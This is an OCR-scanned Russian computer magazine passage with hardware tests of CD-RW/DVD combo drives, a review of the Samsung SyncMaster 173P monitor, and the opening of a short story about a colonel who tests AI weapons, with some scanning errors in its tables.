Пиковая скорость 0.88 Мб/сек | 113 Мб/сек | 118 Мб/сек М/А М/А 114 Мб/сек 


Распознование диска 9.62 сек 5.79 сек 


3.47 сек 6.27 сек | 6.32 сек 6.21 сек 


для GIGABYTE, LG и TEAC, возможно, 
подойдет DVD Region free. 


ТЕСТИРОВАНИЕ 

Итак, переходим к самому интерес- 
ному - к проверке девайсов в работе. 
По нашему мнению, в работе устрой- 
ство, прежде всего, должно отличаться 
стабильностью, способностью про- 
честь практически любой диск и каче- 
ственно записать CD-R/RW, даже если 
при этом оно несколько уступает в ско- 
рости конкурентам. 
Еще до использования тестовых прог- 
рамм мы попробовали просмотреть 
офильм в DivX, записанный Ha CD-R, так 
как именно при этой операции критич- 
на стабильная скорость передачи, а 
процессор загружен раскодированием 
звука и видео. Все приводы справи- 
лись с этой задачей хорошо, и хотя 
время определения диска и скорость 
поиска нужного фрагмента незначи- 
тельно отличались, в процессе прос- 
мотра наиболее быстрых сцен тормо- 
зов замечено не было. Диски с данны- 
ми распознавались быстро, файлы 
считывались без проблем. 


ЧТЕНИЕ CD РАЗНОГО КАЧЕСТВА 
Первым испытанием стало чтение 
CD-ROM с большим количеством неглу- 
боких царапин на отражающей поверх- 
ности. Лучше всех, по нашему мнению, 
с этим тестом справился привод LG, так 
как сразу определил характер диска, 
прочел его ровно, не снижая угловой 
скорости (желтый грабфик), и показал 


МЕТОДЫ ЧТЕНИЯ/ЗАПИСИ 


лучшее время поиска, распознавания 
диска и минимальную загрузку процес- 
сора. Эти результаты перевешивают по- 
казатели средней скорости передачи и 
времени полного прочтения диска, так 
как в жизни пользователю чаще необ- 
ходимы стабильная передача данных и 
быстрый доступ к любой части диска. 
Второй результат показал GIGABYTE, на 
третьем месте SAMSUNG. Хуже всех 
этот тест прошел ТЕАС, который нес- 
колько раз неоправданно пытался под- 
нять скорость на плохом участке. 

Для проверки этих результатов мы да- 
ли тестируемым устройствам прочитать 
CD-ROM с заводским браком (плохой 
областью в конце диска). SONY, GIGA- 
BYTE и TOSHIBA этот тест пройти не 
смогли. Лучше всего с задачей опять 
справился привод LG, который сразу 
взял невысокую скорость и немного 
скинул ее в проблемной области. Вто- 
рым оказался ТЕАС, который, набрав 
высокую скорость на хорошем участке, 
плавно скинул ее до минимума Ha пло- 
хом. Третий - SAMSUNG, который посто- 
янно пытался разогнаться на плохом 
участке, из-за чего ему понадобилось 
значительно больше попыток, чтобы 
прочесть его. 


ЗАПИСЬ CD-R 

Для теста мы взяли высокоскорост- 
ные (1Х-48Х) CD-R DigiteX. Тест заклю- 
чался в том, что Nero CD Speed забивал 
болванку под завязку мусорными фай- 
лами, при этом снимались показатели, а 
после прожига тот же драйв тестировал 
качество диска. Мы считаем, что CD-RW- 
привод должен читать без ошибок хотя 
бы свои диски. 
Лучшие результаты показал девайс 
LG. Он использовал продвинутый ме- 
тод записи Р-СА\ и достиг своей мак- 
симальной скорости записи (40X) к 
середине диска, правда, к концу бол- 
ванки ему пришлось скинуть ско- 
рость go 32Х. По времени LG уступил 
только SAMSUNG. Последующая npo- 
верка качества диска показала иде- 
ально ровный график и полное отсу- 
тствие ошибок - безусловный лидер. 
Вторую позицию занимает привод 
SAMSUNG, который также сделал 
ставку на P-CAV, достиг максималь- 
ной скорости (40X) к середине диска 
и больше ее не снижал, благодаря 
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Тест - запись CD-R 


cD 


GIGABITE 


GIGABITE 


SAMSUNG 


TOSHIBA 
КОНТРОЛЬНЫЙ 
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Кросстест - чтение CD-R, записанных участниками тестирования, всеми остальными приводами 


чему прожег болванку быстрее всех. 
При проверке было найдено 18 оши- 
бок в начале диска, график - практи- 
чески ровный. Третий - девайс GIGA- 
BYTE. Он использовал метод CAV и 
справился с прожигом в числе пер- 
вых. Проверка также показала прак- 
тически ровный график и 2 ошибки в 
самом начале. Привод SONY показал 
неплохие результаты. При ровном гра- 
фике записи и времени, близком к ли- 
дерам, он сделал 265 ошибок в начале 
диска. ТЕАС взял высокий темп с само- 
го начала, но к концу диска, где наи- 
большая линейная скорость (зеленый 
график), резко снизил скорость и сде- 
лал большое количество ошибок. Аут- 
сайдер - TOSHIBA. Используя метод 
СЕМ, этот привод с постоянной ско- 
ростью 12Х (хотя заявленная в специ- 
фикации скорость - 32X) мучил бол- 
ванку 7 минут. При проверке показал 
ломаный график и большое количест- 
во ошибок в конце диска. 


КРОССТЕСТ 

На очереди тест под кодовым наз- 
ванием "Заложи соседа" :). Прелесть 
этого теста заключается в том, что каж- 
дый из участников тестирования может 
подпортить результаты соперникам, но 
при этом рискует показать и свои недос- 
татки тоже. Мы провели тест скорости 
передачи и проверку качества дисков, 
нарезанных тестируемыми девайсами, 
плюс одной NoName болванки, записан- 
ной неизвестным приводом, на каждом 
из участников теста плюс контрольном 
CD-RW SONY СКХ210Е. Результаты наг- 
ляднее всего представлены в таблице 3. 
К сожалению, объем материала не поз- 
воляет поместить в статью все графики, 
которые, кстати, очень интересны, поэ- 
тому сделаем некоторые пояснения. 
Ошибки, обнаруженные некоторыми 
участниками теста при проверке каче- 
ства диска, зачастую являются след- 
ствием недостатков самого привода и 
не подтверждаются другими устройства- 


скорость, то есть количество элементов, 
которые считывает/записывает головка в 
единицу времени, увеличивается. Кроме 
того, вибрация диска возрастает именно у 
краев. Таким образом, при записи и чте- 
нии этих областей возникает больше 
ошибок. Именно это и случилось с диском, 
записанным приводом SAMSUNG, который 
плохо прочитали девайсы LG и SONY, не 
очень хорошо воспринимающие слабые 
области на высокой скорости. Остальные 
приводы, включая контрольный, справи- 
лись с этим диском без проблем. 

Итак, самые качественные диски записа- 
ли приводы SONY и GIGABYTE, LG и SAM- 
SUNG показали приемлемое качество, са- 
мый некачественный диск записал ТЕАС. 
Стабильнее всех CD-R читали GIGABYTE 
и SAMSUNG, хуже всех с тестом справил- 
ся привод SONY. 


GIGABITE LG SAMSUNG SONY TEAC TOSHIBA ми. Например, SONY плохо читает в нача- 
у“ Диск Data CD Data CD Data CD DataCD | DataCD| DataCD ле диска. TEAC, LG и SONY не очень хо- 
Емкость 195973 79:59.73 19:59:13 79:59.73 |79:59.73| 79:59.73 рошо считывают данные ближе к концу 
< Скорость записи диска. TOSHIBA не стесняется скинуть в 
Вид записи DAO DAO DAO DAO DAO DAO этих областях угловую скорость, поэтому 
|= Стартовая скорость 19.15x 21.89x 22.05x 19.05x 18.99x 11.88x делает меньше ошибок, но проигрывает 
Конечная скорость 23.73х 31.98х 39.55х 41.8 4х 16.01x 11.88x в скорости и дает ломаный график. При- 
о Средняя скорость 31.57х 32.34x 34.97x 31.83х | 29.65x 1.88х вод ТЕАС хуже всех записывает в конце 
Метод CAV P-CAV P-CAV CAV CAV CAV диска, поэтому неудивительно, что этот 
- Количество ошибок второго 2 a 18 Е a зе они прочитать LG и в 
уровня й риводы зафиксиро 
r=) Время записи 3.11 мин 3.01 мин 2.52 мин 3.03 мин | 3.27 мин| 7.09 мин вали большое количество ошибок. 
в 219 мин 2:53 мин 2:21 мин 2:35 мин | 2:34 мин| 2:33 мин ре ре Е т р 
© передачи . к - ss : : диска (к его внешней области) линейная 
о 


ЧТЕНИЕ DVD 

В настоящее время юзерами наибо- 
лее широко используются именно Video 
DVD. Для чтения такого рода данных вы- 
сокие скорости не нужны. Однако скоро 
data DVD получат большее распростра- 
нение среди пользователей, поэтому мы 
провели все необходимые тесты. Лучше 
всех с тестом справились SAMSUNG, ко- 
торый прочел диск быстрее всех, и LG, 
который считывал информацию доста- 
точно быстро и стабильнее всех. Осталь- 
ные участники показали примерно рав- 
ные результаты. 
В дополнение к этому тесту мы записа- 
ли CD+RW на приводе GIGABITE и про- 
вели тест чтения этого диска. SONY и 
ТЕАС выполнили тест быстрее всех. 


GIGABITE LG SAMSUNG | SONY TEAC TOSHIBA SAMSUNG читап диск быстро, но нес- 
Диск Data CD Data CD Data CD Data CD | DataCD Data CD табильно. LG и TOSHIBA прочли диск 
Емкость 6518.23 6518.23 6518.23 6518.23 | 6518.23 6518.23 медленнее, но ровно. 
Скорост ь передачи данных 
Стартовая 17.83х 14.16x 19.42x 17.92x 21.16x 18.50x По результатам всех тестов видно, что 
Конечная 26.12x 30.57х 22.25х 7.16x 9.45x 29.51х идеальный комбо-привод тебе вряд ли 
Средняя 28.96х 23.28х 29.42x 27.47x 29.03х 27.93х встретится, так что делай выбор, исходя 
Метод CAV CAV CAV CAV CAV CAV 


из тех параметров, которые важны имен- 
но для тебя. Мы же присуждаем выбор 


Время позиционирования 


Случайное 95 ms 84 ms 96 ms 13 ms 169 ms N/A редакции приводу SAMSUNG, который 
1/3 100 ms 94 ms 108 ms 98 ms 104 ms М/А порадовал нас своим дизайном и пока- 
Полное ТИ ms 165 ms 173 ms 470 ms | 186 ms М/А 


зал высокие результаты практически во 
всех тестах, а также рекомендуем при- 
Bog LG, который хотя и не лидирует по 
скоростным показателям, но стабильно 
читает большинство дисков и неплохо 
записывает CD-R/RW. Также хочется от- 
метить привод GIGABYTE, который про- 
ходит у нас вне конкурса, так как являет- 
ся DVD+/-R/RW, но это самое стабильное 
устройство в обзоре. at 


Использование процессора 
1X 0% 0% 1% 5% 2% 3% 
2Х 1% 1% 1% 7% 5% 1% 
4x 2% 2% 3% 18% 9% 3% 
8х 5% 5% 6% 24% 16% 15% 
Пиковая скорость 1177 Кб/сек |1422 Кб/сек | 831 Кб/сек М/А М/А 1473 Кб/сек 
Время распознования диска Э.Л сек 5.31 сек 819 сек | 6.45 сек | 6.72 сек 7.37 сек 
Время теста скорости передачи | 219 мин 2:53 мин 2:21 мин | 2:35 мин | 2:34 мин| 2:33 мин 
Тест - чтение CD среднего качества 
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SAMSUNG COMBO DRIVE CD-RW/DVD SM-352B 
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SAMSUNG - чтение поцарапанного CD-ROM 


x 
= 
= 
о 
- 
8 
8 
о 


=] 


Привод SAMSUNG имеет очень приятный дизайн и ривод SAMSUNG показал высокие результаты как при 
удобную подсвечивающуюся кнопку выброса лотка. В чтении, так и при записи дисков. Также девайс неплохо 
работе это устройство довольно тихое и не издает справился с некачественными дисками. 
посторонних звуков при чтении дисков. Поток выезжает тихо. 


LG COMBO DRIVE CD-RW/DVD GCC-4480B 
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Цена: $52 
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LG - чтение поцарапанного CD-ROM 


Устройство LG имеет приятную круглую кнопочку выб- Этот драйв показал высокие результаты при чтении дисков 
роса лотка. Сам лоток двигается довольно тихо. В рабо- | в сочетании с приемлемой скоростью и неплохо справился с 
те LG дает приемлемый уровень шума и не издает необычных | записью CD-R. 
звуков. 


SONY COMBO DRIVE CD-RW/DVD CRX300E 
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Цена: $49 
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SONY - запись CD-R 
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SONY - чтение поцарапанного CD-ROM 

Привод SONY имеет стандартное оформление и неу- SONY показал высокий уровень записи, однако чтение CD- 

добную кнопку выброса лотка. Поток двигается доволь- | КОМ и CD-R оставляет желать лучшего. Тем не менее, с каче- 
но громко. В работе привод издает приемлемый уровень шу- ственными дисками проблем не возникнет. 
ма, однако при позиционировании головок и распознавании 
диска слышен неприятный скрип. » 
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КОМБАЙНЫ HA РЫНКЕ! | 


TOSHIBA COMBO DRIVE CD-RW/DVD SD-R1312 
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Цена: $48 
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Размер буфера: 
8 Мб 

Чтение: 
CD/CD-R - 40X 
CD-RW - 40X 
DVD-ROM - 12X 
<] DVD+/-R/RW - 12Х 
Запись: 
CD-R - 32Х р 


CD-RW -10Х — 


TOSHIBA - чтение поцарапанного CD-ROM 


Драйв TOSHIBA имеет стандартный дизайн и не очень 

удобную кнопку выброса лотка. Лоток двигается очень 
громко и издает противные звуки. В работе привод довольно 
громкий, но посторонних шумов не издает. 


Устройство показало средний уровень при чтении 
различных дисков. Скорость же и качество записи не на 
высоте. 


TEAC COMBO DRIVE CD-RW/DVD DW-548D 
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Цена: $54 
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TEAC - чтение поцарапанного CD-ROM 
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Устройство ТЕАС выполнено в стандартном дизайне, 

имеет не очень удобную кнопку выброса лотка. Лоток 
выдвигается тихо. В работе устройство имеет приемлемый 
уровень шума, однако издает неприятный скрип при 
позиционировании головок. 


Этот привод довольно скоростной, однако высокие 
скоростные показатели мешают ему качественно читать и 
записывать диски. 
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GIGABYTE - запись CD-R 


Г = 


= ва 
GIGABYTE - чтение поцарапанного CD-ROM 
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GIGABYTE DVD+/-R/RW Combo Drive GO-WO404A не 
только читает DVD, HO и записывает их, поэтому мы 
поставили это устройство вне конкурса. Чтобы ты мог посмот- 
реть, какие еще драйвы бывают! 
Привод GIGABITE имеет стандартный дизайн и удобную ши- 
рокую кнопку выброса лотка. Лоток двигается тихо. В работе 
девайс - тихий, не издает посторонних звуков. 


Показал наиболее стабильные результаты при чтении и за- 
писи. Запись CD+RW осуществляет на постоянной максималь- 
ной скорости 2Х и справляется с диском емкостью 4,7 Гб за 
25-30 минут. Качество DVD+RW довольно высокое - все при- 
воды из обзора прочли диск без проблем. 
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SAMSUNG 


SYNCMASTER 173Р 


NAQA на этот монитор, 
вспоминаешь легендар- 
ную модель Samsung 
SyncMaster ТИР, дизайн 
которой делала студия 
Porsche. Действительно, Samsung 
SyncMaster 173P имеет возможность по- 
ворота экрана в портретный режим или 
вообще вверх ногами. Также имеется 
удобное кольцо в ножке, которое позво- 
ляет без усилий поворачивать дисплей 
влево/вправо на столе. Можно регули- 
ровать высоту в незначительных преде- 
лах. Однако экран нового монитора мож- 
но расположить и горизонтально. Он 
намного компактнее предшественника, и 
из него не торчат хвосты проводов. 
Очень приятно стремление разработчи- 
ков уменьшить толщину рамки корпуса, 
в которую заключен экран. Правильно! 
Зачем нам рамка? Даешь чистую матри- 
цу без рамок! Samsung SyncMaster 173P 
не имеет встроенных колонок. Действи- 
тельно, систему 51 в монитор не встро- 
ишь, ана меньшее мы уже не согласны! 


В ножке имеются три разъема: DVI, D- 
SUB и питания. Мы, разумеется, реко- 
мендуем использовать цифровой вход 
(DVI). Хотя аналоговый (D-SUB) сигнал 
Samsung SyncMaster 173P понимает 
неплохо. Главное, чтобы аналоговый 
сигнал шел в оптимальном gna матри- 
цы разрешении (1280Х1024) с нормаль- 
ного видеоадаптера. Не секрет, что ста- 
рые видеокарты выдают мыло. Так что 
при покупке LCD-mouuTopa тебе придет- 
ся использовать современную видео- 
карточку. Адаптер питания внешний. 


Интересная сфишка этого монитора - 
полное отсутствие менюшки! Един- 
ственная кнопка на корпусе - "включе- 
ние питания", и та сенсорная. Кстати ря- 
дом с этой кнопкой горит модный ульт- 
расриолетовый светодиод. Виртуальное 
меню управления монитором ставится 
вмести с дровами. Управление сделано 
на нескольких языках в виде HTML- 
срайлов gna Internet Explorer. Вызыва- 
ется оно из выпадающего меню под 
правой кнопкой мыши. Тут же живет 
сосрт для цветовой калибровки и для 
переворота изображения на экране. 


Чтобы управлять монькой через компь- 
ютер, не нужно никаких дополнитель- 


ных проводов, типа USB или RS-232. Ви- 
дать, хитрые инженеры из Samsung nog- 
мешали управляющие команды в виде- 
осигнал, а монитор их отлавливает. Og- 
нако при повороте монитора в портрет- 
ный режим автоматического поворота 
изображения не происходит, это лучше 
делать горячими клавишами или через 
меню. Есть еще над чем поработать! По 
правой кнопке мыши можно быстро 
настроить режимы оптимизации изобра- 
жения Magic Bright. Например, если ты 
смотришь В\О-сфильм, то такой режим 
сделает изображение более ярким и на- 
сыщенным. А вот при работе с текстом 
тебе лучше его отключить. Samsung 
SyncMaster 173P превосходно настраи- 
вается сам, меню в большинстве случа- 
ев не требуется. Но нам кажется, что 
кнопки на самом мониторе очень удоб- 
ны, и сосфтовая менюшка не дает права 
убирать их. Почему бы кнопочному ме- 
ню не сосуществовать с сосртварным? 


Ну и, конечно, Samsung SyncMaster 
173P не смог избежать нашего злоб- 
ного тестирования колориметром и 
сплиттером. Мы получили приемле- 
мую цветопередачу, тут СРТ-монито- 
ры традиционно обгоняют LCD. Режи- 
мы Magic Bright, как им и положено, 
искажают цветопередачу, чтобы сде- 
лать изображение сочнее. 


Сравнивали игру Unreal Tournament 
2003 с СВТ-монитором через видео- 
разветвитель (сплиттер). Изображе- 


ние Samsung SyncMaster 173P значи- 
тельно ярче и контрастнее, поэтому 
играть за ним веселее. Возник старый 
спор о задержках матрицы. Они прак- 
тически незаметны в современных 
ЕСБ-мониторах среднего ценового ди- 
апазона. Тестовая лаборатория чуть 
не передралась в поисках преслову- 
той задержки. Все дело в том, что 
текстуры, которые рассыпались на 
ЖК-мониторе, рассыпались и на ЭЛТ. 
Но один умный и храбрый тестер на- 
шел-таки к чему придраться. Он ввел 
в анриал коды, чтобы взлететь высо- 
ко-высоко. И с огромной высоты еле 
заметные боты стали чуть-чуть боль- 
ше смыливаться, чем на СКТ-монито- 
ре. Словом, играть Ha Samsung 
SyncMaster 173P можно без проблем! 


вывод 

Samsung SyncMaster 173P подойдет 
для пользователей, требовательных к 
дизайну, компактности и сункциональ- 
ности. За ним можно работать, играть, 
смотреть видео, сердрить инет. Для 
этого имеются предустановленные ре- 
жимы оптимизации изображения. Ну и, 
само собой, можно повернуть экран в 
портретный режим, тогда на нем цели- 
ком поместится лист A4 с текстом или 
голая девица в полный рост! =o 
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НАСТОЯЩИЙ 


| аокном моросил мелкий дож- 
дик, настолько мелкий, что ка- 
зался просто водяной пылью. 
Полковнику так и хотелось при- 
жаться лбом к холодному стек- 
лу, чтобы шестым чувством 
ощутить эту мерзкую взвесь 
брызг сквозь прозрачную пре- 
граду. В нем боролись два же- 
лания - выйти под дождь и на- 
= сквозь пропитаться мелкими 
капельками или остаться дома - навсегда. Никогда не высовывать 
носа за дверь. В груди кольнуло. Чуть-чуть, самую малость. Пол- 
ковник незаметно для адъютанта скрипнул зубами. Старость начи- 
нается тогда, когда ты вдруг замечаешь, что у тебя есть сердце... 
Сорок четыре года - маловато для старости. Хотя, кто знает - мо- 
жет быть, в самый раз. 

Фотография. В книжном шкафу за стеклом. Молодой парень в 
летной форме с капитанскими погонами. Там, на фотографии, все 
еще живы... И никто не виноват. "Понимаете, искусственный ин- 
теллект..." Не распознал. Ошибся. С кем не бывает. 

Рядом с фотографией - две медали. Причем одну из них Кузне- 
цов вынужден был всегда прятать, если приходили нежданные и 
непосвященные гости. Нельзя было. На медали - название города, 
в котором официально русских не было никогда. "Над всей Испа- 
нией безоблачное небо". 

Полковник прикоснулся кончиками пальцев к стеклу. На улице 
действительно было прохладно, осенний ветер ворошил листву; 
короче, "Болдинская осень". Пушкин в такую погоду, наверное, пи- 
сал что-нибудь очень и очень пессимистичное - а вот полковнику 
Кузнецову надо было сосредоточиться и вызвать в сознании свет- 
лые и прекрасные мысли, что-нибудь о цветах и бабочках. 

За спиной раздался шорох - адъютант, устав ждать, начал ерзать 
на табуретке у двери. Кузнецов немного повернул голову в сторо- 
ну - шорох прекратился; прапорщик почувствовал недовольство 
начальника, напрягся, даже дышать стал тише. Уходить не хоте- 
лось - и не потому, что над Кузнецовым довлело какое-то предчув- 
ствие, нет. С ним просто случилась метаморфоза на уровне мента- 
литета - ему надоела война. Она так долго продолжалась, что да- 
же солдаты, подобные Кузнецову, устали от нее... 

- Пора, господин полковник, - опасаясь гнева начальства, тихо 
проговорил адъютант. - Машина прогрета. Зонт не забудьте... 

- Не забуду, - буркнул Кузнецов. - Где фляжка? 

- Я... - засуетился на табуретке прапорщик. - Вам нельзя, госпо- 
дин... полковник... Врач... Вы же... 

- Да, - коротко отрезал Кузнецов. - Где фляжка? 

Адъютант не стал сопротивляться дальше. Откуда-то из глубин 
кителя на свет была извлечена серебристая сверкающая посуди- 
на, не издавшая ни единого всплеска, так как была наполнена под 
завязку. Полковник протянул руку, привычным движением отвин- 
тил красивую ребристую крышечку, поднес фляжку к губам. По 
всему телу разлилось тепло, удары сердца стали ровнее - насы- 
щеннее, что ли. 

Кузнецов вышел на улицу следом за прапорщиком. "Лендровер" 
урчал у подъезда, радуя глаз полковника выправленным правым 
крылом (после того, как в День Победы Кузнецов решил вспом- 
нить, что же это такое - держать в руках НАСТОЯЩИЙ руль - маши- 
на почти две недели простояла в ремонте. Полковник перевернул- 
ся дважды, так и не поняв, что же случилось с неожиданно ставшей 
упрямой машиной). Водитель, увидев командира, подобрался, 
приглушил радио, машинально поправил сиденье рядом с собой. 

Полковник открыл дверцу, оглянулся на дом, подняв взгляд к то- 
му окну, из которого он пару минут назад смотрел на улицу. Стек- 
ла блестели, омытые дождевой пылью; сквозь этот водяной блеск 
ничего не было видно. У полковника непроизвольно дернулась ще- 
ка, он вдруг понял, что сержант за рулем и прапорщик, вцепивший- 
ся мертвой хваткой в огромный черный зонт, не сводят с него глаз 
и замечают каждое его движение, чувствуют каждый вдох. Так по- 
лучилось, что они не знали, какое "развлечение" предстоит полков- 
нику сегодня - но оба понимали, что неспроста у Кузнецова ходят 
желваки на скулах и время от времени сжимаются кулаки. 

Кинув последний взгляд на свое окно, где за шторой - он точно 
знал - стояла жена, которая после гибели сына не выходила его 
провожать, Кузнецов поставил ногу на подножку. Прапорщик со 


щелчком сложил зонтик, запрыгнул на заднее сиденье. Хлопнула 
дверца. Полковник положил ладони на поручень на приборной па- 
нели, коротко кивнул. Сержант ответил ему тем же, включил пере- 
дачу; "дворники" смахнули очередную порцию полудождя-полуту- 
мана с лобового стекла. 

Наверху, в окне, колыхнулась тяжелая штора, провожая отъезжа- 
ющий автомобиль... 


ххххх 


Его никто не торопил. Не принято было подгонять того, кто шел 
на полигон. Несмотря на то, что сроки испытания были ДОВОЛЬНО 
жесткими, приказать полковнику не мог никто. При желании он 
имел право отказаться, перенести на час, на день, на неделю. Со- 
слаться на здоровье, на нервы, на погоду. И он уже дважды вос- 
пользовался своим правом. Один раз это случилось в тот день, 
когда его старшая дочь должна была рожать; он всю неделю был 
на взводе, отрывался на подчиненных, требовал у доктора транк- 
вилизаторы - и в итоге отказался от выхода на полигон, где в тот 
раз опробовалась новая техника. 

Спустя семь дней, когда все уже случилось и на свет появился 
прекрасный крепыш, дочь была здорова и счастлива - он сам на- 
значил время испытания, и после того, как сетки прицелов спрое- 
цировались на сетчатку, Кузнецов выполнил несколько упражнений 
на "отлично", а в дополнение ко всему нашел два серьезных недо- 
чета в искусственном интеллекте ракетной установки, а именно в 
том его звене, которое обрабатывало типы самолетов, заходящих 
на бомбометание. 


Во второй раз (примерно год назад) все было гораздо хуже. По- 
гиб Виталий. Единственный сын, пошедший по стопам отца. Погиб 


- Пора, господин полковник, - 
опасаясь гнева начальства, тихо 
проговорил адъютант. - Машина 

прогрета. Зонт не забудьте... 


в бою. Его истребитель был сбит. То, что лежало в "цинке", вряд 
ли имело отношение к останкам мальчика. Куски приборных пане- 
лей, расколотый шлем да несколько обрывков высотного костюма. 
Все, что осталось от сына. И Кузнецов передал право управления 
новой моделью бронетранспортера своему дублеру. 

Он, конечно, присутствовал на испытании. Сидел в бункере, 
смотрел на происходящее через глаза видеокамер, кусал губы и 
вертел в руках жетон Виталия, уцелевший в буре, поглотившей са- 
молет. Кузнецов знал, что смог бы выполнить все задания, данные 
дублеру для прохождения препятствий, но благоразумно решил от- 
клонить непосредственное участие в испытании. Зная себя, он 
очень боялся заполучить в руки оружие. 

Конечно же, все прошло. Горечь утраты улеглась; душевная дра- 
ма спряталась где-то на дне сознания. Полковник регулярно испы- 
тывал новые виды интеллектуального вооружения - танки, ракет- 
ные и зенитные установки, снаряжение киберсолдата, множество 
компьютерных дополнений к обмундированию, делавших человека 
в форме все более и более неуязвимым. Только иногда он бросал 
короткий взгляд в зеркало, глядя на висящий на цепочке на шее 
жетон сына. 

Вот и сегодня - в очередной раз отогнав попытавшиеся встать 
на дыбы мысли о жене и погибшем сыне, Кузнецов отметился 
отпечатком ладони на фоторецепторе секретной службы. Дверь 
бесшумно открылась, лифт опустил его на несколько десятков 
метров под землю и остановился на служебном ярусе номер че- 
тыре. Массивная дверь медотсека приветливо (несмотря на ог- 
ромный вес) распахнулась, впустив Кузнецова внутрь. Док мах- 
нул ему рукой, не отрываясь от своих пробирок, кардиограмм и 
другой чепухи. Полковник опустился в кресло, ставшее за годы 
работы здесь привычным. Впервые опустился в него, не раздев- 
шись до пояса. 

Усталый взгляд скользнул по экранам мониторов, по связкам 
проводов; несколько микроскопов, стоящих в ряд, большие шкафы 
со стеклянными стенками, украшенные надписями "СТЕРИЛЬНО", 
"НАРУЖНОЕ", "НЕОТЛОЖНАЯ ПОМОЩЬ". Кузнецов зачем-то при- 
слушался к успокоившемуся сердцу, не почувствовал никаких Ne- yy 
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ребоев и поднял глаза на врача. Тот стоял в недоумении и смотрел 
на него строгим взглядом. 

- Не сердись, Михалыч, - махнул рукой Кузнецов. - Просто дай 
"добро"... Ты же знаешь, какая работа предстоит мне сегодня. 

Док (он же майор Никита Волощук) продолжал молча смотреть 
на полковника. Спустя пару секунд отвел глаза, сделал несколько 
шагов к шкафу с лекарствами, зачем-то переложил коробочки на 
полках, потом вернул все в первоначальное состояние. Порылся в 
карманах халата, откашлялся, повертел в руках зажигалку; пару раз 
бросил на Кузнецова взгляд через плечо - то ли виноватый, то ли 
задумчивый. Полковник следил за каждым его движением, посту- 
кивая пальцами по подлокотникам. 

- Аесли... - спросил, не оборачиваясь, док. 

- Нет, - ответил Кузнецов. - Безо всяких "если". У меня все по- 
лучится. Эту штуку запустят в серию. И наши парни смогут достой- 
но отомстить за моего Витальку. 

- Тогда почему Вы отказываетесь от контроля? - повернулся врач 
к полковнику. - Ведь никаких "если" нет. 

Кузнецов на секунду задумался, вспомнив ту маленькую иголоч- 
ку, что впервые за всю жизнь кольнула в сердце час назад. Дейст- 
вительно, почему? 

- Не хочу отвлекать тебя от более важных дел, - улыбнулся пол- 
ковник. - Сколько раз за последние четыре года - а ведь ты здесь 
четыре года - испытания отменялись по причине проблем со здо- 
ровьем? 

- Я помню все случаи наизусть, - коротко хмыкнул Михалыч. - 
Три раза. Дважды - по пьянке. Один раз... 

- Когда Пронин застрелился. Я тоже помню. Вместо того чтобы 
проводить медосмотр, ты констатировал смерть. Так посмотри же на 
меня - я трезв, как стеклышко, стреляться не собираюсь, последний 
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раз я чихнул примерно полгода назад - и ты же сам справился с этой 
проблемой в течение двух минут, допустив меня до стрельб; что же 
еще может произойти со мной в самом расцвете лет? 

Волощук принялся разглядывать свои ладони, потом повернул 
их вниз, внимательно рассмотрел каждый ноготь, сжал-разжал ку- 
лаки... В его мыслях шла упорная борьба здравого смысла и инст- 
рукций. Кузнецов закинул ногу на ногу, расслабился. В исходе этой 
внутренней борьбы он был уверен. Спустя минуту Волощук подо- 
шел к своему компьютеру, нажал несколько клавиш - на экране по- 
явилась фотография Кузнецова и несколько строк текста. Шумно 
выдохнув для храбрости, майор набрал необходимую команду - и 
на личной карточке полковника, прикрепленной слева на груди, за- 
жегся зеленый квадратик. Его яркий свет давал Кузнецову право 
проходить в любое служебное помещение на стартовом этаже. 

Полковник благодарно кивнул, встал, пожал Никите руку. Потом по- 
вернулся и вышел из медотсека, направляясь навстречу новой работе. 

Волощук сел в кресло, которое было еще теплым, подключил к 
своим запястьям пару датчиков, снял кардиограмму, неразборчи- 
вым, истинно медицинским, почерком написал в верхнем углу фа- 
милию "Кузнецов" и, даже не взглянув на нее, пришпилил степле- 
ром к личному делу полковника. 


RK eK: 


Кузнецов всегда думал, что пригодность человека к военной 
службе можно определить по одному-единственному критерию - 
по его отношению к эстетике оружия. Он неоднократно спорил 
на эту тему со своими коллегами, приводил массу аргументов в 
поддержку своей версии, но далеко не всегда находил понима- 
ние. Он не умел спорить; точнее сказать, он разучился это де- 
лать, несмотря на два высших образования - инженерное и во- 
енное (за плечами была Академия Бронетанковых войск). Армия 
вынудила его стать прямолинейным, не терпящим возражений 
человеком, и поэтому все его аргументы обычно воспринима- 
лись только в виде приказов. 

Он считал - и так было очень давно, с детства - что вычислить 
склонность человека к военному делу очень просто. ДОСТАТОЧНО 
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ВЫЯСНИТЬ, ВИДИТЕ ЛИ ВЫ КРАСОТУ В ОРУЖИИ. Если да - други- 
ми словами, если вы в состоянии оценить оружие как произведе- 
ние искусства, испытывать вдохновение, держа в руках пистолет 
или прижимаясь щекой к холодному прикладу, восхищаться изги- 
бами торпедного катера и фигурами высшего пилотажа - вы про- 
сто созданы для того, чтобы носить погоны. Если нет - вы обрече- 
ны всю жизнь быть "пиджаком", далеким от суровых армейских 
будней, человеком второго сорта. 

Кузнецова всегда привлекало оружие. Еще со школы он пронес 
это ощущение благоговейного трепета при взгляде на средства 
умерщвления людей. Начав посещать с шестого класса стрелковый 
кружок, он втянулся в этот процесс на уровне зависимости - при- 
клад "мелкашки" вызывал в нем бурю эмоций, несравнимых с те- 
ми, что возникали при решении квадратных уравнений и разгляды- 
вании тычинок и пестиков. Лежа на драном матрасе в школьном 
тире, установив локоть левой руки в правильную позицию и удер- 
живая тяжелую для школьника винтовку нетренированным еще за- 
пястьем - он был и Робин Гудом, и Кожаным Чулком, и Вильгель- 
мом Теллем одновременно. "Правая нога - продолжение ствола". 
Он сам был продолжением ствола. 

Оружие дисциплинировало, заставляло подчиняться необходи- 
мым для безопасности условиям. Убрать руки со спускового крюч- 
ка, если в секторе мишеней человек, подходить к позиции только 
по команде, никаких шуток с оружием. Список можно было продол- 
жать бесконечно... 

Он брал призы, грамоты, кубки на стрелковых соревнованиях - 
но он стрелял не ради стрельбы и побед. Оружие звало его за со- 
бой; он практически не замечал красоты мотоциклов, автомобилей, 
одежды. Единственное, что еще могло привлечь его взгляд - краси- 
вая девушка. Но если ему казалось, что эта девушка в военной фор- 
ме будет выглядеть нелепо - она пропадала для него навсегда. 

На одной из стрелковых спартакиад, незадолго до выпускно- 
го вечера в школе, он взял все возможные призы - и личный за- 
чет, и командный - и ему в качестве наградного бонуса было 
позволено стрелять на полигоне из всех видов оружия. Время от 
времени Кузнецов оглядывался назад, в тот день, и приходил к 
выводу, что именно тогда определился выбор его профессии. 
Расстреливая из пулемета стенды, он наслаждался запахом го- 
